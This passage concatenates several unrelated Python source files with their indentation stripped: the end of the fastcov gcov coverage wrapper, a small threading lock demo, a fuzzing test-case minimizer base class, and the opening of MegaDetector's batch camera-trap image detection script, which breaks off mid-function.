removeFiles(globCoverageFiles(args.directory, GCOV_GCDA_EXT))
logging.info("Removed {} .gcda files".format(len(coverage_files)))
sys.exit()
# Fire up one gcov per cpu and start processing gcdas
gcov_filter_options = getGcovFilterOptions(args)
fastcov_json = processGcdas(args, coverage_files, gcov_filter_options)
# Summarize processing results
logging.info("Processed {} .gcov files ({} total, {} skipped)".format(GCOVS_TOTAL - GCOVS_SKIPPED, GCOVS_TOTAL, GCOVS_SKIPPED))
logging.debug("Final report will contain coverage for the following %d source files:\n %s", len(fastcov_json["sources"]), "\n ".join(fastcov_json["sources"]))
return fastcov_json
def formatCoveredItems(covered, total):
coverage = (covered * 100.0) / total if total > 0 else 100.0
coverage = round(coverage, 2)
return "{:.2f}%, {}/{}".format(coverage, covered, total)
def dumpStatistic(fastcov_json):
total_lines = 0
covered_lines = 0
total_functions = 0
covered_functions = 0
total_files = len(fastcov_json["sources"])
covered_files = 0
for source_name, source in fastcov_json["sources"].items():
is_file_covered = False
for test_name, test in source.items():
total_lines += len(test["lines"])
for execution_count in test["lines"].values():
covered_lines += 1 if execution_count > 0 else 0
is_file_covered = is_file_covered or execution_count > 0
total_functions += len(test["functions"])
for function in test["functions"].values():
covered_functions += 1 if function['execution_count'] > 0 else 0
is_file_covered = is_file_covered or function['execution_count'] > 0
if is_file_covered:
covered_files = covered_files + 1
logging.info("Files Coverage: {}".format(formatCoveredItems(covered_files, total_files)))
logging.info("Functions Coverage: {}".format(formatCoveredItems(covered_functions, total_functions)))
logging.info("Lines Coverage: {}".format(formatCoveredItems(covered_lines, total_lines)))
def dumpFile(fastcov_json, args):
if args.lcov:
dumpToLcovInfo(fastcov_json, args.output)
logging.info("Created lcov info file '{}'".format(args.output))
else:
dumpToJson(fastcov_json, args.output)
logging.info("Created fastcov json file '{}'".format(args.output))
if args.dump_statistic:
dumpStatistic(fastcov_json)
def tupleToDotted(tup):
return ".".join(map(str, tup))
def parseArgs():
parser = argparse.ArgumentParser(description='A parallel gcov wrapper for fast coverage report generation')
parser.add_argument('-z', '--zerocounters', dest='zerocounters', action="store_true", help='Recursively delete all gcda files')
# Enable Branch Coverage
parser.add_argument('-b', '--branch-coverage', dest='branchcoverage', action="store_true", help='Include only the most useful branches in the coverage report.')
parser.add_argument('-B', '--exceptional-branch-coverage', dest='xbranchcoverage', action="store_true", help='Include ALL branches in the coverage report (including potentially noisy exceptional branches).')
parser.add_argument('-A', '--exclude-br-lines-starting-with', dest='exclude_branches_sw', nargs="+", metavar='', default=[], help='Exclude branches from lines starting with one of the provided strings (i.e. assert, return, etc.)')
parser.add_argument('-a', '--include-br-lines-starting-with', dest='include_branches_sw', nargs="+", metavar='', default=[], help='Include only branches from lines starting with one of the provided strings (i.e. if, else, while, etc.)')
parser.add_argument('-X', '--skip-exclusion-markers', dest='skip_exclusion_markers', action="store_true", help='Skip reading source files to search for lcov exclusion markers (such as "LCOV_EXCL_LINE")')
parser.add_argument('-x', '--scan-exclusion-markers', dest='scan_exclusion_markers', action="store_true", help='(Combine operations) Force reading source files to search for lcov exclusion markers (such as "LCOV_EXCL_LINE")')
# Capture untested file coverage as well via gcno
parser.add_argument('-n', '--process-gcno', dest='use_gcno', action="store_true", help='Process both gcno and gcda coverage files. This option is useful for capturing untested files in the coverage report.')
# Filtering Options
parser.add_argument('-s', '--source-files', dest='sources', nargs="+", metavar='', default=[], help='Filter: Specify exactly which source files should be included in the final report. Paths must be either absolute or relative to current directory.')
parser.add_argument('-e', '--exclude', dest='excludepost', nargs="+", metavar='', default=[], help='Filter: Exclude source files from final report if they contain one of the provided substrings (i.e. /usr/include test/, etc.)')
parser.add_argument('-eg', '--exclude-glob', dest='excludepost_glob', nargs="+", metavar='', default=[], help='Filter: Exclude source files by glob pattern from final report if they contain one of the provided substrings (i.e. /usr/include test/, etc.)')
parser.add_argument('-i', '--include', dest='includepost', nargs="+", metavar='', default=[], help='Filter: Only include source files in final report that contain one of the provided substrings (i.e. src/ etc.)')
parser.add_argument('-f', '--gcda-files', dest='coverage_files', nargs="+", metavar='', default=[], help='Filter: Specify exactly which gcda or gcno files should be processed. Note that specifying gcno causes both gcno and gcda to be processed.')
parser.add_argument('-E', '--exclude-gcda', dest='excludepre', nargs="+", metavar='', default=[], help='Filter: Exclude gcda or gcno files from being processed via simple find matching (not regex)')
parser.add_argument('-u', '--diff-filter', dest='diff_file', default='', help='Unified diff file with changes which will be included into final report')
parser.add_argument('-ub', '--diff-base-dir', dest='diff_base_dir', default='', help='Base directory for sources in unified diff file, usually repository dir')
parser.add_argument('-g', '--gcov', dest='gcov', default='gcov', help='Which gcov binary to use')
parser.add_argument('-d', '--search-directory', dest='directory', default=".", help='Base directory to recursively search for gcda files (default: .)')
parser.add_argument('-c', '--compiler-directory', dest='cdirectory', default="", help='Base directory compiler was invoked from (default: . or read from gcov) \
This needs to be set if invoking fastcov from somewhere other than the base compiler directory. No need to set it if gcc version > 9.1')
parser.add_argument('-j', '--jobs', dest='jobs', type=int, default=multiprocessing.cpu_count(), help='Number of parallel gcov to spawn (default: {}).'.format(multiprocessing.cpu_count()))
parser.add_argument('-m', '--minimum-chunk-size', dest='minimum_chunk', type=int, default=5, help='Minimum number of files a thread should process (default: 5). \
If you have only 4 gcda files but they are monstrously huge, you could change this value to a 1 so that each thread will only process 1 gcda. Otherwise fastcov will spawn only 1 thread to process all of them.')
parser.add_argument('-F', '--fallback-encodings', dest='fallback_encodings', nargs="+", metavar='', default=[], help='List of encodings to try if opening a source file with the default fails (i.e. latin1, etc.). This option is not usually needed.')
parser.add_argument('-l', '--lcov', dest='lcov', action="store_true", help='Output in lcov info format instead of fastcov json')
parser.add_argument('-o', '--output', dest='output', default="", help='Name of output file (default: coverage.json or coverage.info, depends on --lcov option)')
parser.add_argument('-q', '--quiet', dest='quiet', action="store_true", help='Suppress output to stdout')
parser.add_argument('-t', '--test-name', dest='test_name', default="", help='Specify a test name for the coverage. Equivalent to lcov\'s `-t`.')
parser.add_argument('-C', '--add-tracefile', dest='combine', nargs="+", help='Combine multiple coverage files into one. If this flag is specified, fastcov will do a combine operation instead invoking gcov. Equivalent to lcov\'s `-a`.')
parser.add_argument('-V', '--verbose', dest="verbose", action="store_true", help="Print more detailed information about what fastcov is doing")
parser.add_argument('-w', '--validate-sources', dest="validate_sources", action="store_true", help="Check if every source file exists")
parser.add_argument('-p', '--dump-statistic', dest="dump_statistic", action="store_true", help="Dump total statistic at the end")
parser.add_argument('-v', '--version', action="version", version='%(prog)s {version}'.format(version=__version__), help="Show program's version number and exit")
args = parser.parse_args()
if not args.output:
args.output = 'coverage.info' if args.lcov else 'coverage.json'
return args
def checkPythonVersion(version):
"""Exit if the provided python version is less than the supported version."""
if version < MINIMUM_PYTHON:
sys.stderr.write("Minimum python version {} required, found {}\n".format(tupleToDotted(MINIMUM_PYTHON), tupleToDotted(version)))
sys.exit(EXIT_CODES["python_version"])
def checkGcovVersion(version):
"""Exit if the provided gcov version is less than the supported version."""
if version < MINIMUM_GCOV:
sys.stderr.write("Minimum gcov version {} required, found {}\n".format(tupleToDotted(MINIMUM_GCOV), tupleToDotted(version)))
sys.exit(EXIT_CODES["gcov_version"])
def setupLogging(quiet, verbose):
handler = logging.StreamHandler()
handler.setFormatter(FastcovFormatter("[%(levelname)s]: %(message)s"))
root = logging.getLogger()
root.setLevel(logging.INFO)
root.addHandler(handler)
if not quiet:
logging.disable(level=logging.NOTSET) # Re-enable logging
if verbose:
root.setLevel(logging.DEBUG)
def main():
args = parseArgs()
# Setup logging
setupLogging(args.quiet, args.verbose)
# Get report from appropriate source
if args.combine:
fastcov_json = getCombineCoverage(args)
skip_exclusion_markers = not args.scan_exclusion_markers
else:
fastcov_json = getGcovCoverage(args)
skip_exclusion_markers = args.skip_exclusion_markers
# Scan for exclusion markers
if not skip_exclusion_markers:
processExclusionMarkers(fastcov_json, args.jobs, args.exclude_branches_sw, args.include_branches_sw, args.minimum_chunk, args.fallback_encodings)
logging.info("Scanned {} source files for exclusion markers".format(len(fastcov_json["sources"])))
if args.diff_file:
logging.info("Filtering according to {} file".format(args.diff_file))
DiffParser().filterByDiff(args.diff_file, args.diff_base_dir, fastcov_json, args.fallback_encodings)
if args.validate_sources:
validateSources(fastcov_json)
# Dump to desired file format
dumpFile(fastcov_json, args)
# If there was an error along the way, but we still completed the pipeline...
if EXIT_CODE:
sys.exit(EXIT_CODE)
# Set package version... it's way down here so that we can call tupleToDotted
__version__ = tupleToDotted(FASTCOV_VERSION)
if __name__ == '__main__':
main()
|
lock.py | #!/usr/bin/env python
# encoding: UTF-8
import threading
import time
data=0
lock=threading.Lock()
def func():
global data
print'%s acquire lock...'%threading.currentThread().getName()
if lock.acquire():
print'%s get the lock.'%threading.currentThread().getName()
data+=1
time.sleep(2)
print'%s release lock...'%threading.currentThread().getName()
lock.release()
t1=threading.Thread(target=func)
t2=threading.Thread(target=func)
t3=threading.Thread(target=func)
t1.start()
t2.start()
t3.start()
|
minimizer.py | # Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Base classes for other minimizers."""
import copy
import functools
import os
import tempfile
import time
import threading
import errors
DEFAULT_CLEANUP_INTERVAL = 20
DEFAULT_THREAD_COUNT = 8
DEFAULT_TESTS_PER_THREAD = 4
MAX_MERGE_BATCH_SIZE = 32
PROGRESS_REPORT_INTERVAL = 300
class DummyLock(object):
"""Dummy to replace threading.Lock for single-threaded tests."""
def __enter__(self):
pass
def __exit__(self, exec_type, value, traceback):
pass
def __nonzero__(self):
return False
class TestQueue(object):
"""Queue to store commands that should be executed to test hypotheses."""
def __init__(self,
thread_count,
deadline_check=None,
progress_report_function=None,
per_thread_cleanup_function=None):
self.thread_count = thread_count
self.deadline_check = deadline_check
self.progress_report_function = progress_report_function
self.per_thread_cleanup_function = per_thread_cleanup_function
self.lock = threading.Lock()
self.queue = []
def _pop(self):
"""Pull a single hypothesis to process from the queue."""
with self.lock:
if not self.queue:
return None
return self.queue.pop(0)
def _work(self):
"""Process items from the queue until it is empty."""
while not self.deadline_check or not self.deadline_check(soft_check=True):
current_item = self._pop()
if not current_item:
break
test, test_function, completion_callback, should_run = current_item # pylint: disable=unpacking-non-sequence
if not should_run():
continue
result = test_function(test)
completion_callback(result)
if self.per_thread_cleanup_function:
self.per_thread_cleanup_function()
# Abort if we have exceeded the deadline for this operation.
if self.deadline_check and self.deadline_check(soft_check=True):
break
def _cleanup(self):
"""Clean up the queue to be sure that no more tasks will be executed."""
with self.lock:
self.queue = []
def push(self,
test,
test_function,
completion_callback,
should_run=lambda: True):
"""Add a test to the queue and a callback to run on completion."""
with self.lock:
self.queue.append((test, test_function, completion_callback, should_run))
def force(self,
test,
test_function,
completion_callback,
should_run=lambda: True):
"""Force a test to the front of the queue."""
entry = (test, test_function, completion_callback, should_run)
with self.lock:
self.queue.insert(0, entry)
def size(self):
"""Return the number of unprocessed tasks in the queue."""
return len(self.queue)
def process(self):
"""Process all tests in the queue and block until completion."""
while self.queue:
threads = [
threading.Thread(target=self._work) for _ in xrange(self.thread_count)
]
for thread in threads:
thread.start()
while any([thread.is_alive() for thread in threads]):
if self.deadline_check:
self.deadline_check(cleanup_function=self._cleanup)
if self.progress_report_function:
self.progress_report_function()
time.sleep(1)
class Testcase(object):
"""Single test case to be minimized."""
def __init__(self, data, minimizer):
self.minimizer = minimizer
if minimizer.tokenize:
self.tokens = minimizer.tokenizer(data)
else:
self.tokens = data
self.required_tokens = [True] * len(self.tokens)
self.tested_hypotheses = set()
self.unmerged_failing_hypotheses = []
self.tests_to_queue = []
self.currently_processing = False
self.last_progress_report_time = 0
self.runs_since_last_cleanup = 0
if minimizer.max_threads > 1:
self.test_queue = TestQueue(
minimizer.max_threads,
deadline_check=self._deadline_exceeded,
progress_report_function=self._report_progress)
self.merge_preparation_lock = threading.Lock()
self.merge_lock = threading.Lock()
self.cache_lock = threading.Lock()
self.tests_to_queue_lock = threading.Lock()
else:
self.test_queue = None
self.merge_preparation_lock = DummyLock()
self.merge_lock = DummyLock()
self.cache_lock = DummyLock()
self.tests_to_queue_lock = DummyLock()
def __str__(self):
"""Return the string form of the minimized test case (at this point)."""
return self.minimizer.token_combiner(self.get_required_tokens())
# Helper functions based on minimizer configuration.
def _deadline_exceeded(self, cleanup_function=None, soft_check=False):
"""Check to see if we have exceeded the deadline for execution."""
if self.minimizer.deadline and time.time() > self.minimizer.deadline:
if soft_check:
return True
# If we are here, we have exceeded the deadline on a hard check. Clean up.
if cleanup_function:
cleanup_function()
if self.minimizer.cleanup_function:
self.minimizer.cleanup_function()
# Raise an exception if this is not a soft deadline check.
raise errors.MinimizationDeadlineExceededError(self)
return False
def _delete_file_if_needed(self, input_file):
"""Deletes a temporary file if necessary."""
# If we are not running in a mode where we need to delete files, do nothing.
if not self.minimizer.tokenize or not self.minimizer.delete_temp_files:
return
try:
os.remove(input_file)
except OSError:
pass
def _report_progress(self):
"""Call a function to report progress if the minimizer uses one."""
if not self.minimizer.progress_report_function:
return
if time.time() - self.last_progress_report_time < PROGRESS_REPORT_INTERVAL:
return
self.last_progress_report_time = time.time()
message = '%d/%d tokens remaining.' % (len(self.get_required_tokens()),
len(self.required_tokens))
self.minimizer.progress_report_function(message)
# Functions used when preparing tests.
def _range_complement(self, current_range):
"""Return required tokens in the complement of the specified range."""
result = xrange(len(self.tokens))
to_remove = set(current_range)
return [i for i in result if i not in to_remove and self.required_tokens[i]]
def _prepare_test_input(self, tokens, tested_tokens):
"""Write the tokens currently being tested to a temporary file."""
tested_tokens = set(tested_tokens)
current_tokens = [t for i, t in enumerate(tokens) if i in tested_tokens]
if not self.minimizer.tokenize:
return current_tokens
data = self.minimizer.token_combiner(current_tokens)
handle = self.minimizer.get_temp_file()
destination = handle.name
try:
handle.write(data)
except IOError:
# We may have filled the disk. Try processing tests and writing again.
self._do_single_pass_process()
handle.write(data)
handle.close()
return destination
def _get_test_file(self, hypothesis):
"""Return a test file for a hypothesis."""
complement = self._range_complement(hypothesis)
return self._prepare_test_input(self.tokens, complement)
def _push_test_to_queue(self, hypothesis):
"""Add a test for a hypothesis to a queue for processing."""
test_file = self._get_test_file(hypothesis)
callback = functools.partial(
self._handle_completed_test,
hypothesis=hypothesis,
input_file=test_file)
should_run = functools.partial(self._contains_required_tokens, hypothesis,
test_file)
self.test_queue.push(
test_file,
self.minimizer.test_function,
callback,
should_run=should_run)
# Make sure that we do not let too many unprocessed tests build up.
if self.test_queue.size() >= self.minimizer.batch_size:
self._do_single_pass_process()
def prepare_test(self, hypothesis):
"""Prepare the test based on the mode we are running in."""
# Check the cache to make sure we have not tested this before.
if self._has_tested(hypothesis):
return
# If we are single-threaded, just run and process results immediately.
if not self.test_queue:
# In the threaded case, we call the cleanup function before each pass
# over the queue. It needs to be tracked here for the single-thread case.
self.runs_since_last_cleanup += 1
if (self.runs_since_last_cleanup >=
self.minimizer.single_thread_cleanup_interval and
self.minimizer.cleanup_function):
self.minimizer.cleanup_function()
test_file = self._get_test_file(hypothesis)
if self._contains_required_tokens(hypothesis, test_file):
self._handle_completed_test(
self.minimizer.test_function(test_file), hypothesis, test_file)
# Check to see if we have exceeded the deadline and report progress.
self._report_progress()
self._deadline_exceeded()
return
if self.currently_processing:
# If we are processing, we cannot write more tests or add to the queue.
with self.tests_to_queue_lock:
self.tests_to_queue.append(hypothesis)
else:
self._push_test_to_queue(hypothesis)
# Functions used when processing test results.
def _handle_completed_test(self, test_passed, hypothesis, input_file):
"""Update state based on the test result and hypothesis."""
# If the test failed, handle the result.
if not test_passed:
self._handle_failing_hypothesis(hypothesis)
# Delete leftover files if necessary.
self._delete_file_if_needed(input_file)
# Minimizers may need to do something with the test result.
self._process_test_result(test_passed, hypothesis)
def _process_test_result(self, test_passed, hypothesis):
"""Additional processing of the result. Minimizers may override this."""
pass
def _handle_failing_hypothesis(self, hypothesis):
"""Update the token list for a failing hypothesis."""
if not self.test_queue:
# We aren't multithreaded, so just update the list directly.
for token in hypothesis:
self.required_tokens[token] = False
return
with self.merge_preparation_lock:
self.unmerged_failing_hypotheses.append(hypothesis)
if len(self.unmerged_failing_hypotheses) < MAX_MERGE_BATCH_SIZE:
return
hypotheses_to_merge = self.unmerged_failing_hypotheses
self.unmerged_failing_hypotheses = []
# We may need to block while the previous batch is merging. If not, the
# results from this batch could conflict with the results from the previous.
with self.merge_lock:
self._attempt_merge(hypotheses_to_merge)
def _attempt_merge(self, hypotheses, sibling_merge_succeeded=False):
"""Update the required token list if the queued changes don't conflict."""
# If there's nothing to merge, we're done.
if not hypotheses:
return
aggregate_tokens = set()
for hypothesis in hypotheses:
for token in hypothesis:
aggregate_tokens.add(token)
aggregate_hypothesis = list(aggregate_tokens)
if sibling_merge_succeeded:
# We were able to remove all tokens from the other half of this
# hypothesis, so we can assume that this would fail without running the
# test. If this would also pass, there would not have been a conflict
# while testing this set. Well, this could be a flaky test, but then we
# have bigger problems.
test_passed = True
else:
complement = self._range_complement(aggregate_hypothesis)
test_file = self._prepare_test_input(self.tokens, complement)
test_passed = self.minimizer.test_function(test_file)
self._delete_file_if_needed(test_file)
# Failed (crashed), so there was no conflict here.
if not test_passed:
for token in aggregate_hypothesis:
self.required_tokens[token] = False
return True
# Passed (no crash). We need to try a bit harder to resolve this conflict.
if len(hypotheses) == 1:
# We really cannot remove this token. No additional work to be done.
return False
front = hypotheses[:len(hypotheses) / 2]
back = hypotheses[len(hypotheses) / 2:]
# If we could remove either one of two hypotheses, favor removing the first.
front_merged_successfully = self._attempt_merge(front)
self._attempt_merge(back, sibling_merge_succeeded=front_merged_successfully)
return False
def _do_single_pass_process(self):
"""Process through a single pass of our test queue."""
self.currently_processing = True
self.test_queue.process()
# If a cleanup function is provided, call it. This is usually used to
# ensure that all processes are terminated or perform additional cleanup.
if self.minimizer.cleanup_function:
self.minimizer.cleanup_function()
# Push any results generated while this test was running to the queue.
self.currently_processing = False
while self.tests_to_queue:
with self.tests_to_queue_lock:
hypothesis = self.tests_to_queue.pop(0)
# This may trigger another round of processing, so don't hold the lock.
self._push_test_to_queue(hypothesis)
def process(self):
"""Start a test."""
if not self.test_queue:
return
while self.test_queue.size():
self._do_single_pass_process()
with self.merge_preparation_lock:
hypotheses_to_merge = self.unmerged_failing_hypotheses
self.unmerged_failing_hypotheses = []
with self.merge_lock:
self._attempt_merge(hypotheses_to_merge)
# Cache functions.
def _contains_required_tokens(self, hypothesis, test_file):
"""Check to see if this hypothesis contains untested tokens."""
# It is possible that we could copy this while it is being updated. We do
# not block in this case because the worst case scenario is that we run an
# irrelevant test, and blocking is potentially expensive.
working_required_tokens = copy.copy(self.required_tokens)
with self.merge_preparation_lock:
# A deep copy is not required. Hypotheses are not modified after being
# added to the list for processing.
unprocessed_hypotheses = copy.copy(self.unmerged_failing_hypotheses)
for unprocessed_hypothesis in unprocessed_hypotheses:
for token in unprocessed_hypothesis:
# For this check, we do not care if the merge would succeed or not since
# the best case is that we would add the token to the queue as well.
working_required_tokens[token] = False
for token in hypothesis:
if working_required_tokens[token]:
return True
# If we aren't going to run this test, this will not have a completion
# callback. If that happens, we need to clean up now.
self._delete_file_if_needed(test_file)
return False
def _has_tested(self, hypothesis):
"""Check to see if this hypothesis has been tested before."""
hypothesis_tuple = tuple(hypothesis)
with self.cache_lock:
if hypothesis_tuple in self.tested_hypotheses:
return True
self.tested_hypotheses.add(hypothesis_tuple)
return False
# Result checking functions.
def get_result(self):
"""Get the result of minimization."""
if not self.minimizer.tokenize:
return self.get_required_tokens()
return str(self)
def get_required_tokens(self):
"""Return all required tokens for this test case."""
return [t for i, t in enumerate(self.tokens) if self.required_tokens[i]]
def get_required_token_indices(self):
"""Get the indices of all remaining required tokens."""
return [i for i, v in enumerate(self.required_tokens) if v]
def _default_tokenizer(s):
"""Default string tokenizer which splits on newlines."""
return s.split('\n')
def _default_combiner(tokens):
"""Default token combiner which assumes each token is a line."""
return '\n'.join(tokens)
class Minimizer(object):
"""Base class for minimizers."""
def __init__(self,
test_function,
max_threads=1,
tokenizer=_default_tokenizer,
token_combiner=_default_combiner,
tokenize=True,
cleanup_function=None,
single_thread_cleanup_interval=DEFAULT_CLEANUP_INTERVAL,
deadline=None,
get_temp_file=None,
delete_temp_files=True,
batch_size=None,
progress_report_function=None,
file_extension=''):
"""Initialize a minimizer. A minimizer object can be used multiple times."""
self.test_function = test_function
self.max_threads = max_threads
self.tokenizer = tokenizer
self.token_combiner = token_combiner
self.tokenize = tokenize
self.cleanup_function = cleanup_function
self.single_thread_cleanup_interval = single_thread_cleanup_interval
self.deadline = deadline
self.get_temp_file = get_temp_file
self.delete_temp_files = delete_temp_files
self.progress_report_function = progress_report_function
if batch_size:
self.batch_size = batch_size
else:
self.batch_size = DEFAULT_TESTS_PER_THREAD * max_threads
if not get_temp_file:
self.get_temp_file = functools.partial(
tempfile.NamedTemporaryFile,
mode='wb',
delete=False,
prefix='min_',
suffix=file_extension)
else:
self.get_temp_file = get_temp_file
@staticmethod
def _handle_constructor_argument(key, kwargs, default=None):
"""Cleanup a keyword argument specific to a subclass and get the value."""
result = default
try:
result = kwargs[key]
del kwargs[key]
except KeyError:
pass
return result
def _execute(self, data):
"""Perform minimization on a test case."""
raise NotImplementedError
def minimize(self, data):
"""Wrapper to perform common tasks and call |_execute|."""
try:
testcase = self._execute(data)
except errors.MinimizationDeadlineExceededError, error:
# When a MinimizationDeadlineExceededError is raised, the partially
# minimized test case is stored with it so that we can recover the work
# that had been done up to that point.
testcase = error.testcase
return testcase.get_result()
@staticmethod
def run(data, thread_count=DEFAULT_THREAD_COUNT, file_extension=''):
"""Minimize |data| using this minimizer's default configuration."""
raise NotImplementedError
|
run_detector_batch.py | r"""
Module to run an animal detection model on lots of images, writing the results
to a file in the same format produced by our batch API:
https://github.com/microsoft/CameraTraps/tree/master/api/batch_processing
This enables the results to be used in our post-processing pipeline; see
api/batch_processing/postprocessing/postprocess_batch_results.py .
This script can save results to checkpoints intermittently, in case disaster
strikes. To enable this, set --checkpoint_frequency to n > 0, and results
will be saved as a checkpoint every n images. Checkpoints will be written
to a file in the same directory as the output_file, and after all images
are processed and final results file written to output_file, the temporary
checkpoint file will be deleted. If you want to resume from a checkpoint, set
the checkpoint file's path using --resume_from_checkpoint.
The `threshold` you can provide as an argument is the confidence threshold above
which detections will be included in the output file.
Has preliminary multiprocessing support for CPUs only; if a GPU is available, it will
use the GPU instead of CPUs, and the --ncores option will be ignored. Checkpointing
is not supported when using multiprocessing.
Sample invocation:
# All on the 1212-image test subset
CUDA_VISIBLE_DEVICES=0 python detection/run_detector_batch.py ~/models/camera_traps/megadetector/md_v4.1.0/md_v4.1.0.pb ~/data/test-small ~/tmp/mdv4test.json --output_relative_filenames --recursive # 2.52 im/s
CUDA_VISIBLE_DEVICES=0 python detection/run_detector_batch.py ~/models/camera_traps/megadetector/md_v4.1.0/md_v4.1.0.pb ~/data/test-small ~/tmp/mdv4test.json --output_relative_filenames --recursive --use_image_queue # 3.03 im/s
CUDA_VISIBLE_DEVICES=0 python detection/run_detector_batch.py ~/models/camera_traps/megadetector/camonly_mosaic_xlarge_dist_5a_last.torchscript.pt ~/data/test-small ~/tmp/mdv5test-00.json --output_relative_filenames --recursive # 5.77 im/s
CUDA_VISIBLE_DEVICES=0 python detection/run_detector_batch.py ~/models/camera_traps/megadetector/camonly_mosaic_xlarge_dist_5a_last.torchscript.pt ~/data/test-small ~/tmp/mdv5test-01.json --output_relative_filenames --recursive --use_image_queue # 7.2 im/s
CUDA_VISIBLE_DEVICES=0 python detection/run_detector_batch.py ~/models/camera_traps/megadetector/camonly_mosaic_xlarge_dist_5a_last.pt ~/data/test-small ~/tmp/mdv5test-00.json --output_relative_filenames --recursive # 6.54 im/s
CUDA_VISIBLE_DEVICES=0 python detection/run_detector_batch.py ~/models/camera_traps/megadetector/camonly_mosaic_xlarge_dist_5a_last.pt ~/data/test-small ~/tmp/mdv5test-01.json --output_relative_filenames --recursive --use_image_queue # 8.44 im/s
CUDA_VISIBLE_DEVICES=0 python run_detector_batch.py ~/models/camera_traps/megadetector/camonly_mosaic_xlarge_dist_5a_last.pt ~/data/KRU ~/tmp/mdv5test-00.json --output_relative_filenames --recursive
CUDA_VISIBLE_DEVICES=0 python run_detector_batch.py ~/models/camera_traps/megadetector/mdv5_camonly_mosaic_xlarge_dist_5c_epoch28.pt ~/data/KRU ~/tmp/mdv5test-00.json --output_relative_filenames --recursive
"""
#%% Constants, imports, environment
import argparse
import json
import os
import sys
import time
import copy
import shutil
import warnings
import itertools
from datetime import datetime
from functools import partial
import humanfriendly
from tqdm import tqdm
# from multiprocessing.pool import ThreadPool as workerpool
import multiprocessing
from threading import Thread
from multiprocessing import Process
from multiprocessing.pool import Pool as workerpool
# Number of images to pre-fetch
max_queue_size = 10
use_threads_for_queue = False
verbose = False
# Useful hack to force CPU inference.
#
# Need to do this before any PT/TF imports
force_cpu = False
if force_cpu:
os.environ['CUDA_VISIBLE_DEVICES'] = '-1'
from detection.run_detector import ImagePathUtils, is_gpu_available, load_detector
from detection.run_detector import FAILURE_INFER, DEFAULT_OUTPUT_CONFIDENCE_THRESHOLD,\
FAILURE_IMAGE_OPEN, DEFAULT_DETECTOR_LABEL_MAP
import visualization.visualization_utils as viz_utils
# Numpy FutureWarnings from tensorflow import
warnings.filterwarnings('ignore', category=FutureWarning)
#%% Support functions for multiprocessing
def producer_func(q,image_files):
"""
Producer function; only used when using the (optional) image queue.
Reads up to N images from disk and puts them on the blocking queue for processing.
"""
if verbose:
print('Producer starting'); sys.stdout.flush()
for im_file in image_files:
try:
if verbose:
print('Loading image {}'.format(im_file)); sys.stdout.flush()
image = viz_utils.load_image(im_file)
except Exception as e:
print('Producer process: image {} cannot be loaded. Exception: {}'.format(im_file, e))
raise
if verbose:
print('Queueing image {}'.format(im_file)); sys.stdout.flush()
q.put([im_file,image])
q.put(None)
print('Finished image loading'); sys.stdout.flush()
def consumer_func(q,return_queue,model_file,confidence_threshold):
"""
Consumer function; only used when using the (optional) image queue.
Pulls images from a blocking queue and processes them.
"""
if verbose:
print('Consumer starting'); sys.stdout.flush()
start_time = time.time()
detector = load_detector(model_file)
elapsed = time.time() - start_time
print('Loaded model (before queueing) in {}'.format(humanfriendly.format_timespan(elapsed)))
sys.stdout.flush()
results = []
while True:
r = q.get()
if r is None:
q.task_done()
return_queue.put(results)
return
im_file = r[0]
image = r[1]
if verbose:
print('De-queued image {}'.format(im_file)); sys.stdout.flush()
results.append(process_image(im_file,detector,confidence_threshold,image))
if verbose:
print('Processed image {}'.format(im_file)); sys.stdout.flush()
q.task_done()
def run_detector_with_image_queue(image_files,model_file,confidence_threshold,quiet=False):
"""
Driver function for the (optional) multiprocessing-based image queue; only used when --use_image_queue
is specified. Starts a reader process to read images from disk, but processes images in the
process from which this function is called (i.e., does not currently spawn a separate consumer
process).
"""
q = multiprocessing.JoinableQueue(max_queue_size)
return_queue = multiprocessing.Queue(1)
if use_threads_for_queue:
producer = Thread(target=producer_func,args=(q,image_files,))
else:
producer = Process(target=producer_func,args=(q,image_files,))
producer.daemon = False
producer.start()
# TODO
#
# The queue system is a little more elegant if we start one thread for reading and one
# for processing, and this works fine on Windows, but because we import TF at module load,
# CUDA will only work in the main process, so currently the consumer function runs here.
#
# To enable proper multi-GPU support, we may need to move the TF import to a separate module
# that isn't loaded until very close to where inference actually happens.
run_separate_consumer_process = False
if run_separate_consumer_process:
if use_threads_for_queue:
consumer = Thread(target=consumer_func,args=(q,return_queue,model_file,confidence_threshold,))
else:
consumer = Process(target=consumer_func,args=(q,return_queue,model_file,confidence_threshold,))
consumer.daemon = True
consumer.start()
else:
consumer_func(q,return_queue,model_file,confidence_threshold)
producer.join()
print('Producer finished')
if run_separate_consumer_process:
consumer.join()
print('Consumer finished')
q.join()
print('Queue joined')
results = return_queue.get()
return results
#%% Other support funtions
def chunks_by_number_of_chunks(ls, n):
"""
Splits a list into n even chunks.
Args
- ls: list
- n: int, # of chunks
"""
for i in range(0, n):
yield ls[i::n]
#%% Image processing functions
def process_images(im_files, detector, confidence_threshold, use_image_queue=False, quiet=False):
"""
Runs MegaDetector over a list of image files.
Args
- im_files: list of str, paths to image files
- detector: loaded model or str (path to .pb/.pt model file)
- confidence_threshold: float, only detections above this threshold are returned
Returns
- results: list of dict, each dict represents detections on one image
see the 'images' key in https://github.com/microsoft/CameraTraps/tree/master/api/batch_processing#batch-processing-api-output-format
"""
if isinstance(detector, str):
start_time = time.time()
detector = load_detector(detector)
elapsed = time.time() - start_time
print('Loaded model (batch level) in {}'.format(humanfriendly.format_timespan(elapsed)))
if use_image_queue:
run_detector_with_image_queue(im_files, detector, confidence_threshold, quiet=quiet)
else:
results = []
for im_file in im_files:
results.append(process_image(im_file, detector, confidence_threshold, quiet=quiet))
return results
def process_image(im_file, detector, confidence_threshold, image=None, quiet=False):
"""
Runs MegaDetector over a single image file.
Args
- im_file: str, path to image file
- detector: loaded model
- confidence_threshold: float, only detections above this threshold are returned
- image: previously-loaded image, if available
Returns:
- result: dict representing detections on one image
see the 'images' key in https://github.com/microsoft/CameraTraps/tree/master/api/batch_processing#batch-processing-api-output-format
"""
if not quiet:
print('Processing image {}'.format(im_file))
if image is None:
try:
image = viz_utils.load_image(im_file)
except Exception as e:
if not quiet:
print('Image {} cannot be loaded. Exception: {}'.format(im_file, e))
result = {
'file': im_file,
